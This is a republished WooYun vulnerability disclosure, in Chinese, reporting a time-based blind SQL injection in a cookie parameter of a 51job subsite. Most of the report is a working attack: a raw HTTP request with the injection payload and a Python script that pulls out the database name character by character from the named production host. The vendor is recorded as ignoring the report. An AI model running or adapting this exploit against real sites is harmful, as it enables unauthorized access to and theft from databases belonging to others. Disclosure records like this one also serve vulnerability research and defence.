51job分站存在SQL注入 admin 109577文章 90评论 2017年5月1日17:35:05评论391 views字数 213阅读0分42秒阅读模式 摘要2016-06-10: 细节已通知厂商并且等待厂商处理中 2016-06-10: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-17: 厂商已经主动忽略漏洞,细节向公众公开 漏洞概要 关注数(4) 关注此漏洞 缺陷编号: WooYun-2016-218066 漏洞标题: 51job分站存在SQL注入 相关厂商: 前程无忧(51job) 漏洞作者: 路人甲 提交时间: 2016-06-10 18:51 公开时间: 2016-06-17 11:00 漏洞类型: SQL注射漏洞 危害等级: 高 自评Rank: 10 漏洞状态: 漏洞已经通知厂商但是厂商忽略漏洞 漏洞来源:www.wooyun.org ,如有疑问或需要帮助请联系 Tags标签: 无 1人收藏 漏洞详情 披露状态: 2016-06-10: 细节已通知厂商并且等待厂商处理中 2016-06-10: 厂商已查看当前漏洞内容,细节仅向厂商公开 2016-06-17: 厂商已经主动忽略漏洞,细节向公众公开 简要描述: 51job分站存在SQL注入 详细说明: code 区域 GET /order.html HTTP/1.1 Cookie: ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(USER,1,1))>103)%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7 X-Requested-With: XMLHttpRequest Referer: http://research.51job.com/ Host: research.51job.com Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21 Accept: */* current result is h{{l code 区域 #!/usr/bin/python # coding=utf-8 import httplib,time,string,sys,random,urllib import requests def getPayloadCookie(i,payload): x = "ASPSESSIONIDQCCBRQDA=PAAEILKAFGNBCKPECJMAKPMM; readlist=196%2C25%2C294%2C340%2C307; orderlist=-1)%3Bif(ascii(substring(DB_NAME(),"+str(i)+",1))>"+str(ord(payload))+")%20waitfor%20delay%20'0:0:10'%20--%20; Hm_lvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491620,1465491620,1465491621,1465491621; Hm_lpvt_2fb608bf1ad8b9b8ce2e04b58003184e=1465491621; HMACCOUNT=CE77C9E3D0040FF7" headers = { 'Host': 'research.51job.com', 'Accept': '*/*', 'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36', 'Accept-Encoding': 'gzip, deflate, sdch', 'Accept-Language': 'zh-CN,zh;q=0.8,en;q=0.6,ja;q=0.4', 'X-Requested-With': 'XMLHttpRequest', 'Referer': 'http://research.51job.com/', 'Connection': 'Keep-alive', 'Cookie': x } return headers def exploit(): res = '' url = 'http://research.51job.com/order.html' payloads = ['@','_','.']+ list(string.ascii_lowercase)+list(string.ascii_uppercase) +[str(i) for i in range(10) ] payloads = sorted(payloads,reverse=True) for i in range(1,30,1): for payload in payloads: try: headers = getPayloadCookie(i,payload) response = requests.request(method='GET',url=url,headers=headers, timeout=3) print chr(ord(payload)+1), sys.stdout.flush() except Exception,e: res += chr(ord(payload)+1) print "/ncurrent result is",res break print res if __name__=='__main__': exploit() #getPayloadCookie(2,'a') 漏洞证明: 修复方案: 版权声明:转载请注明来源 路人甲@乌云 漏洞回应 厂商回应: 危害等级:无影响厂商忽略 忽略时间:2016-06-17 11:00 厂商回复: 漏洞Rank:15 (WooYun评价) 最新状态: 暂无 漏洞评价: 对本漏洞信息进行评价,以更好的反馈信息的价值,包括信息客观性,内容是否完整以及是否具备学习价值 漏洞评价(共0人评价): 登陆后才能进行评分 评价 点赞 http://cn-sec.com/archives/722.html 复制链接 复制链接 左青龙 微信扫一扫 右白虎 微信扫一扫
评论